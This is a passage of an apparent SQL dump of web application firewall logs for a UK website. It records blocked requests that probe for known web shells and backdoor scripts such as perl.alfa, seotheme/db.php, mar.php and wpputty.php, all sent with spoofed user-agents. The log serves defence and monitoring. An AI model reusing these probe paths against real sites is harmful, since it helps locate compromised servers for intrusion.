User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11728,1674201214.724431,1674201214.377900,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11729,1674201212.519590,1674201212.408300,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(11730,1674201210.970811,1674201210.838200,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11731,1674201210.683022,1674201210.531300,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11732,1674201203.450244,1674201203.288600,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11733,1674201203.060937,1674201202.909000,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11734,1674207905.627382,1674207905.365400,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11735,1674207905.213028,1674207904.969100,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11736,1674207904.858243,1674207904.590900,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11737,1674207904.815967,1674207904.536000,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11738,1674216510.178453,1674216510.037600,'\0\0\0\0\0\0\0\0\0\0��Q�:V',0,403,0,0,0,'https://dailyjolly.co.uk/0/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzAvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11739,1674228957.765235,1674228957.634400,'\0\0\0\0\0\0\0\0\0\0���\r��',0,403,0,0,0,'https://dailyjolly.co.uk/00/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzAwL2xpY2Vuc2UudHh0\",\"category\":\"brute-force\",\"ssl\":1}'),(11740,1674254941.854324,1674254941.727900,'\0\0\0\0\0\0\0\0\0\0��;I�',0,403,0,0,0,'https://dailyjolly.co.uk/02/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzAyL2xpY2Vuc2UudHh0\",\"category\":\"brute-force\",\"ssl\":1}'),(11741,1674268148.896870,1674268148.432200,'\0\0\0\0\0\0\0\0\0\0��o��K',0,403,0,0,0,'https://dailyjolly.co.uk/03/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzAzL2xpY2Vuc2UudHh0\",\"category\":\"brute-force\",\"ssl\":1}'),(11742,0.000000,1674270713.353048,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://www.dailyjolly.co.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(11743,1674281463.526279,1674281463.397400,'\0\0\0\0\0\0\0\0\0\0��l��',0,403,0,0,0,'https://dailyjolly.co.uk/1/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzEvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11744,1674288040.849678,1674288040.692200,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L2pvb2JpL2luYy9vcGVuZmxhc2hjaGFydC9waHAtb2ZjLWxpYnJhcnkvb2ZjX3VwbG9hZF9pbWFnZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11745,1674294191.063751,1674294190.925100,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wpputty/wpputty.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHB1dHR5L3dwcHV0dHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11746,1674295043.276973,1674295043.143300,'\0\0\0\0\0\0\0\0\0\0��[)B�',0,403,0,0,0,'https://dailyjolly.co.uk/10/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzEwL2xpY2Vuc2UudHh0\",\"category\":\"brute-force\",\"ssl\":1}'),(11747,1674308701.041526,1674308700.913800,'\0\0\0\0\0\0\0\0\0\0��>�_�',0,403,0,0,0,'https://dailyjolly.co.uk/100/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzEwMC9saWNlbnNlLnR4dA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11748,1674311780.102731,1674311779.983100,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11749,1674311776.098342,1674311775.933300,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11750,1674311763.056339,1674311762.891400,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11751,1674311755.367654,1674311755.233600,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11752,1674342852.356429,1674342852.245000,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11753,1674342850.083921,1674342849.956300,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11754,1674342844.833027,1674342844.718600,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11755,1674342842.812662,1674342842.685900,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11756,1674337440.521587,1674337440.336500,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 